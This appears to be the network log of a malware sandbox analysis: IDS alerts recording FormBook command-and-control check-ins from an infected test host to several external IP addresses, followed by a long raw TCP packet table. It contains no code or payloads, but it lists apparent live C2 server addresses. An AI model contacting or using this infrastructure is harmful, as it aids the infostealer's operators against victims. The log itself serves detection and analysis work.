                                                                                                                                                                                                                                              2024-10-24T15:20:06.704003+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002084.32.84.3280TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:09.260559+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55002184.32.84.3280TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:11.898123+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55002284.32.84.3280TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:11.898123+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55002284.32.84.3280TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:17.685267+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500233.33.130.19080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:20.245208+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500243.33.130.19080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:22.794697+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5500253.33.130.19080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:25.338793+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5500263.33.130.19080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:25.338793+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5500263.33.130.19080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:31.649129+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550027129.226.176.9080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:34.211362+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550028129.226.176.9080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:36.756154+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550029129.226.176.9080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:39.303019+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550030129.226.176.9080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:39.303019+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550030129.226.176.9080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:45.365532+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550031213.249.67.1080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:47.912709+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550032213.249.67.1080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:50.459325+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550033213.249.67.1080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:53.021801+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550034213.249.67.1080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:53.021801+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550034213.249.67.1080TCP
                                                                                                                                                                                                                                              2024-10-24T15:20:58.859899+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003567.223.117.16980TCP
                                                                                                                                                                                                                                              2024-10-24T15:21:01.398710+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003667.223.117.16980TCP
                                                                                                                                                                                                                                              2024-10-24T15:21:04.347829+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.55003767.223.117.16980TCP
                                                                                                                                                                                                                                              2024-10-24T15:21:06.507896+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55003867.223.117.16980TCP
                                                                                                                                                                                                                                              2024-10-24T15:21:06.507896+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.55003867.223.117.16980TCP
                                                                                                                                                                                                                                              2024-10-24T15:21:15.678139+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.550039129.226.56.20080TCP
                                                                                                                                                                                                                                              2024-10-24T15:21:15.678139+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.550039129.226.56.20080TCP
                                                                                                                                                                                                                                              2024-10-24T15:21:21.986343+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.550040162.0.215.3380TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.327611923 CEST8049908162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.327867985 CEST4990880192.168.2.5162.0.215.33
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.328464985 CEST4990880192.168.2.5162.0.215.33
                                                                                                                                                                                                                                              Oct 24, 2024 15:17:58.334017992 CEST8049908162.0.215.33192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.358536959 CEST4994080192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.364743948 CEST8049940154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.364957094 CEST4994080192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.374195099 CEST4994080192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:03.379515886 CEST8049940154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:04.033938885 CEST8049940154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:04.066632032 CEST8049940154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:04.066732883 CEST4994080192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:04.881043911 CEST4994080192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:05.968180895 CEST4995680192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.000852108 CEST8049956154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.003484011 CEST4995680192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.053886890 CEST4995680192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.059422970 CEST8049956154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.669924021 CEST8049956154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.701738119 CEST8049956154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:06.701911926 CEST4995680192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:07.568451881 CEST4995680192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:08.595652103 CEST4997280192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:08.601593971 CEST8049972154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:08.601686954 CEST4997280192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:08.641904116 CEST4997280192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:08.647834063 CEST8049972154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:08.647878885 CEST8049972154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:09.268960953 CEST8049972154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:09.300314903 CEST8049972154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:09.300403118 CEST4997280192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:10.146589994 CEST4997280192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.165052891 CEST4998880192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.170622110 CEST8049988154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.170833111 CEST4998880192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.178035975 CEST4998880192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.183604002 CEST8049988154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.826174021 CEST8049988154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.858014107 CEST8049988154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.858270884 CEST4998880192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.859081030 CEST4998880192.168.2.5154.7.176.67
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:11.864675999 CEST8049988154.7.176.67192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.899707079 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.905070066 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.905157089 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.916616917 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:16.922276020 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102643967 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102709055 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102727890 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102762938 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102771997 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102777004 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102803946 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102804899 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102834940 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102859974 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102890968 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102933884 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.102988005 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.103005886 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.103045940 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.108412981 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.108447075 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.108479023 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.108503103 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.108505964 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.108573914 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.108700037 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.162349939 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.318763971 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.318924904 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.318941116 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.318970919 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.318994999 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319097996 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319097996 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319109917 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319185972 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319195032 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319221020 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319258928 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319283009 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319286108 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319359064 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.319973946 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320008039 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320029974 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320065975 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320326090 CEST8049991118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:18.320380926 CEST4999180192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764357090 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771301031 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771378994 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771419048 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771436930 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771471977 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771507978 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771541119 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771569967 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.771610975 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990695000 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990751982 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990825891 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990856886 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990870953 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990914106 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.990947962 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991046906 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991094112 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991266966 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991353035 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991389990 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.991395950 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992074966 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992129087 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992134094 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992171049 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992221117 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992407084 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992468119 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992506981 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.992515087 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.993392944 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.993463993 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107760906 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107839108 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107876062 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107888937 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107912064 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107966900 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.107992887 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108007908 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108056068 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108243942 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108292103 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108344078 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108704090 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108762980 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108800888 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108815908 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108839989 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.108891964 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.150583029 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.150638103 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.150686979 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.150687933 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.193412066 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.219250917 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.219398022 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.219499111 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224824905 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224900961 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224931955 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224966049 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.224991083 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225001097 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225017071 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225038052 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225076914 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225092888 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225173950 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225217104 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225231886 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225266933 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225307941 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.225986958 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.226033926 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.226083040 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267618895 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267678976 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267715931 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267731905 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267755985 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.267882109 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.336225033 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.336270094 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.336605072 CEST4999480192.168.2.5118.139.178.37
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341603994 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341653109 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341691017 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:26.341727018 CEST8049994118.139.178.37192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:10.631089926 CEST5000480192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:10.636478901 CEST805000484.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:11.649832964 CEST5000580192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:11.655210972 CEST805000584.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:11.655344963 CEST5000580192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:11.667177916 CEST5000580192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:11.672677040 CEST805000584.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:11.672734976 CEST805000584.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:12.472367048 CEST805000584.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:12.472445965 CEST5000580192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:13.177978039 CEST5000580192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:13.183398008 CEST805000584.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:14.196387053 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:14.201936960 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:14.203023911 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:14.209057093 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:14.214575052 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027726889 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027750969 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027761936 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027821064 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027898073 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027909994 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027920008 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027930021 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027940035 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027952909 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027966022 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027966022 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.027966976 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.028068066 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.028068066 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.141282082 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.141520023 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.142513037 CEST5000680192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:15.147824049 CEST805000684.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.203392982 CEST5000780192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.210299969 CEST805000784.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.213063002 CEST5000780192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.224915981 CEST5000780192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:20.230645895 CEST805000784.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:21.037507057 CEST805000784.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:21.037599087 CEST5000780192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:21.740454912 CEST5000780192.168.2.584.32.84.32
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:21.746088982 CEST805000784.32.84.32192.168.2.5
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:22.759306908 CEST5000880192.168.2.584.32.84.32
